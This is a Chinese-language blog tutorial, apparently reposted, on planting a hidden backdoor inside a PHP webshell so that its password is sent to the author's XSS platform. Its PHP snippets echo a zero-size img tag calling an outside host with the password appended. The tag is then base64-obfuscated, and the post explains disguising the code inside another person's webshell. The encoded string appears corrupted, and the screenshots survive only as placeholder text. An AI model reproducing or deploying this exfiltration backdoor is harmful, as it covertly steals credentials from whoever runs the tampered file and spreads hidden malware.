给你的PHP大马添加后门(黑吃黑)

Part 1 引子

  说什么好呢,发个图就当个引子好了。

技术分享图片

 

Part 2 XSS平台

  创建项目

技术分享图片

 

 

  选择类型

技术分享图片

 

 

  xss代码

技术分享图片

 

 

  小实验,刷新代码

技术分享图片

 

 

  XSS平台上

技术分享图片

 

Part 3 后门

 我们写这样一个脚本

<?php
$password = ‘admin‘;  // 假设这个大马密码
                              // 这个是你自己的xss代码 
echo ‘<img width=0height=0 src="http://xss.cn/xss.php?do=api&id=c7rL&location=‘.$password.‘"/>‘;

  

  浏览器,运行脚本

技术分享图片

 

 

  XSS平台上

技术分享图片

 

   加密XSS代码

技术分享图片

 

 

  最终脚本

<?php
$password = ‘hacksb‘; // 假设这个大马密码 $url = ‘base64加密代码‘; $hm = base64_decode($url); echo $hm.$password.‘ "/>‘;

  

  测试下,运行脚本。

<?php
$password = ‘hacksb‘; 
$url = ‘PGltZB3aWR0aD0waGVpZ2h0PTAgc3JjPJodHRwOi8veHzMS5jbi94c3MucGhwP2RvPWFwaSZpZD1jNJmxvY2F0a9uPQ==‘;
$hm = base64_decode($url);
echo $hm.$password.‘ "/>‘;

 

技术分享图片

  

  

  XSS平台上

技术分享图片

 

 

Part 3 利用

  找个大马。

技术分享图片

   

  

  插入后门代码。总之,尽可能不被别人轻而易举识破。还有变量名不要和大马本身冲突。

技术分享图片

  

  

  运行大马。

技术分享图片

  

  XSS平台上。嘿嘿嘿

技术分享图片

 

  

 Part 4 后记

  这后门还不够完善,例如抓包,F12后门就漏出来了,有待完善。例如后门代码只运行一次,本地测试环境不执行后门代码。

技术分享图片

 

参考: https://bbs.ichunqiu.com/thread-18486-1-1.html

 

给你的PHP大马添加后门(黑吃黑)

原文:https://www.cnblogs.com/s0mf/p/9218928.html

人吐槽 人点赞

猜你喜欢

发表评论

用户名: 密码:
验证码: 匿名发表

你可以使用这些语言

查看评论:给你的PHP大马添加后门(黑吃黑)